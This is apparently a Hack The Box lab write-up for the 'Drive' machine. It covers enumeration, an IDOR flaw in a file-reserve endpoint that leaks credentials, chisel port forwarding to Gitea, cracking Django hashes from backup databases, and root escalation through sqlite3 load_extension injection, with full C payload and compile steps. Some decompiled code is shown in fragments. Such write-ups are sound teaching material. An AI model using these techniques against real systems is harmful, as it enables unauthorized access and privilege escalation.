Machine name: HTB Drive
Level: Hard
Machine OS: Linux
Link: Drive
Drive is a linux machine about enumerating and finding a unauthenticated endpoint which lets you reserve file so you can read it, which leads to Information Disclosure which leads to initial foothold on the box. From then on, we find a gitea instance running, which we port forward it with chisel to find the password for 7z archives, after cracking those hashes, we login as another user to get user.txt. For privesc, we reverse engineer a binary and exploit sqlite3 load_extension module, lets get into it!
Table of Contents
Open Table of Contents
Kill Chain
Full port scan
Let’s start with a full port scan with nmap
nmap -p- IP --min-rate=2000 -vvv
22/tcp open ssh syn-ack
80/tcp open http syn-ack
2887/tcp filtered aironetddp no-response
3000/tcp filtered ppp no-response
8257/tcp filtered unknown no-response
18832/tcp filtered unknown no-response
19488/tcp filtered unknown no-response
31934/tcp filtered unknown no-response
37592/tcp filtered unknown no-response
42059/tcp filtered unknown no-response
60721/tcp filtered unknown no-response
we see there are just two ports open and other are filtered so we will keep our focus to open ports, now lets start service detection on these open ports
Service scan
nmap -sC -sV -p22,80 -oN drive.nmap IP
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 275a9fdb91c316e57da60d6dcb6bbd4a (RSA) | 256 9d076bc847280df29f81f2b8c3a67853 (ECDSA)
|_ 256 1d30349f797369bdf667f3343c1ff94e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Doodle Grive
lets head over to port 80
upon visiting the site we get the following, so its basically a website about storing files like a google drive
upon registering we get the upload file and dashboard button, lets check it out
after registering
lets visit dashboard
dashboard /home the dashboard brings us to what files are there and its information
- Files
upload file
Reserve files It lets you reserve files under your name, with this you can essentially edit the content of unreserved files and view it. this will help later
Unreserve files it lets you unreserve files, meaning its out there for anyone to view it and own it under their name
View file we see that our file number is
lets try other files
idor fuzzing
lets fuzz file 99 returns unauth, so we know the file exists
999 returns server error so we can conclude the file doesnt exist python script
f = open("numbers.txt",'w')
for i in range(0,999):
lets create a wordlist 0-999 and send it to wfuzz to check for other files cmd:
wfuzz -u http://drive.htb/FUZZ/getFileDetail/ -w numbers.txt --follow --hw 11 -p localhost:8080 -b "sessionid=wxi6mpbfs1dqhj5b4id8oik2o8fze7po"
-w for wordlist
--follow follows redirect
-p ran it through burp
-b our sessionid
o/p: we get some files, out of which 100 is the admin file on homepage and 112,115 is our files. lets see if we can reserve the other files under our name.
so the vulnerability lies in the reserve
functionality, where you can pass in any file and it will reserve the file for you meaning only you can read it so we can take advantage of this
after intercepting the Reserve
request, we change the file id to 79
and send the request to receive the following request. it appears to be password for martin
The funny thing is the above Reserve
is the only attack vector vulnerable, when you go to Files > ReserveFiles
it sends a POST request to /blockFile
in contrast to when you go from Dashboard > Reserve
files it sends a GET request to /[id]/block
so those two are different functionality keep in mind.
After retrieving the other files we find they’re also taking about databases file. again this will help us later, therefore you must have your enumeration game tight!
Initial Foothold
we get the foothold of the machine by ssh-ing into the machine we find that there are three other local users, lets further enumerate the machine
we cant run any commands as sudo
sudo -l
users and group
lets see the process list cmd:
ps -ef --forest
let’s see what ports are active
ss -anltp
we see theres 3306 33060
which is mysql
and 3000
port. we can curl port 3000 it to confirm its a gitea instance
From here on, we port forward it
chisel reverse port forward
on target machine
./chisel client R:3000:
on attacking machine
./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
well, we dont have any password for any user, so we are still missing a piece.
Now if we remember from the fuzzing we found a file that talked about databases in /var/www/backups
, lets cd into it to find
database file
the backups db are password protected and we couldnt crack it, but if we try the db.sqlite3
db we can see theres a table called accounts_customer
The hash format is 124
Django (SHA-1)
,we could only crack the hash for
but oh bummer, we cant ssh as tom.
lets try gitea creds for martinCruz since we know his username now and we get logged in
we find the password for 7z zip file in db_backup.sh
we transfer the db in /var/www/backups
files form target machine to our machine and use it to extract the db files. The passwords are under accounts_customuser
now, one thing here is the 1_Dec_db_backup.sqlite3.7z
had a different hash type and it was taking its sweet time to crack it so we skipped that one, the other hashes we found were able to crack
hash from oct sqlite
hash from Nov sqlite
only one password works for tom and thats in 1_Nov_db_backup.sqlite3.7z
and we get user.txt
after cracking the password for tom and ssh into the machine to get user.txt
From the symbol table we find the main_menu function which seems to be the main entry point for the binary, and from there we find the username and password
looking at the main_menu function we get
so in order to exploit this, the main thing were looking out for is user input in any of the functions, and in fact we do have one function called 5. Activate user account
activate_user_account as we can see the if condition checks if the username is empty, and when its not (else block) it calls a function called
, lets check it out -
void sanitize_string(long username)
bool bVar1;
ulong uVar2;
long in_FS_OFFSET;
int local_3c;
int local_38;
uint i;
undefined8 blacklist;
undefined local_21;
long local_20;
local_20 = *(long *)(in_FS_OFFSET + 0x28);
local_3c = 0;
blacklist = 0x5c7b2f7c20270a00; //array of blacklist char \{/| '
local_21 = 0x3b; // ; semicolor
local_38 = 0;
do {
uVar2 = FUN_00401180(username);
if (uVar2 <= (ulong)(long)local_38) {
*(undefined *)(username + local_3c) = 0;
if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail(); //stack smashing detection function
bVar1 = false;
for (i = 0; i < 9; i = i + 1) {
if (*(char *)(username + local_38) == *(char *)((long)&blacklist + (long)(int)i)) {
bVar1 = true; //if username has blacklist char, break
if (!bVar1) {
*(undefined *)(local_3c + username) = *(undefined *)(local_38 + username);
local_3c = local_3c + 1; // do something? idk
local_38 = local_38 + 1; //no idea either?
} while( true );
so with this link https://stackoverflow.com/questions/12424883/is-it-possible-to-test-if-loading-extensions-is-enabled-in-sqlite-3 we see that the load_extension is enabled
Now the whole idea of the exploit is to load a malicious module, which could be anything like reading root.txt or setting SUID on /bin/bash, so we create a malicious C file
to cat root.txt
its also important to note that the load_extension takes in shared library files, now if we look at the documentation of sqlite https://www.sqlite.org/loadext.html,
reading further down we also see them mentioning the naming convetion of load_extension armed with this information and sanitize_string check we need to do the following
- Dont overrun the username input limit (48 characters)
- name our extension like
sqlite3_[ONE LETTER]_init
- substitute for blacklisted characers (use decimal to substitute for
from ascii table) - escape the query
- the effective query becomes
"/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SE T is_active=1 WHERE username=\"\""+load_extension(char(46,47,98))+"\'"
- create a c file
#include <unistd.h>
void sqlite3_b_init() {
system("/usr/bin/cat /root/root.txt > /tmp/guys.txt");
- compile it as a shared library
gcc -shared -o b.so -fPIC b.c
- run the binary -> login -> select option 5
- exit out and cat
- sql query
"/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SE T is_active=1 WHERE username=\"\";\'"
46 is . in ascii dec
47 is / in ascii dec
98 is b in ascii dec
side node: i tried getting a reverse shell but its broken i couldnt run any commands
source code analysis
- file object structure
class File(models.Model):
name = models.CharField(max_length=50 , unique=True)
file = models.FileField(upload_to=get_upload_path )
owner = models.ForeignKey(
block = models.ForeignKey(CustomUser, null=True,on_delete=models.SET_NULL ,blank=True , related_name='block')
content = models.TextField(default="none")
createdDate = models.DateTimeField(auto_now_add=True)
groups = models.ManyToManyField(G)
def __str__(self):
return self.name
The File object structure has a field called block
if its null then the /[id]/block
and /blockFile
will work
- block_one_file
def block_one_file(request, id):
user = request.user
file = get_object_or_404(File, id = id)
file.block = user
groups = file.groups.all()
userGroups = user.g_set.all()
level = 0
for group in groups:
if userGroups.filter(id = group.id ).exists(): #l.g_set.all().filter(id = f.id).exists()
level = 1
#log action
log_record = {'user': request.user.username , 'method' : 'blockFile' , 'file_name' : file.name , 'time_stamp': str(datetime.datetime.now())}
log(log_record, 'files-log.json', 2)
file_obj = open((SITE_ROOT+'/media/'+ str(file.file) ))
data = file_obj.read()
file.content = data.splitlines()
return render(request , 'getFileDetail.html' , {'file': file , 'user':user , 'level':level})
as we can see theres no check if we own the file or not and it directly blocks the files then log it
so the functionality of block_one_f
when you hover over Reserver button you see http://drive.htb/113/block/
113 being the id of the file and after fuzzing for available files we get the idea on how to exploit it
- blockFile
def blockFile(request):
user = request.user
if request.method == 'POST':
files = File.objects.all().filter(name__in = request.POST.getlist('files'))
user_Bloackable_File = File.objects.all().filter(groups__in = user.g_set.all()).distinct()
with transaction.atomic():
for file in files:
if file.block is None and file in user_Bloackable_File:
file.block = user
#log action
log_record = {'user': request.user.username , 'method' : 'blockFile' , 'file_name' : file.name , 'time_stamp': str(datetime.datetime.now())}
log(log_record, 'files-log.json', 2)
return JsonResponse({'status':'fail','message':'operation failed'})
return JsonResponse({'status':'success','message':'files Reserved successfully'})
mygroups = user.g_set.all()
i = 0
result = G.objects.none()
while i< len(mygroups):
result = list(chain(mygroups[i].file_set.all() , result))
i = i+1
result = set(result)
return render( request, 'blockFile.html' , {'files': result})
here we see that theres a check user_Bloackable_File
which retrieves the file thats owned by us to block it
and theres also another conditional if file.block is None and file in user_Bloackable_File
so the first check is true the file is not blocked but the second check is false because we dont own the file and therefore it gets out of the conditional if and directly sends the response that operation is successful.
Thank you for reading!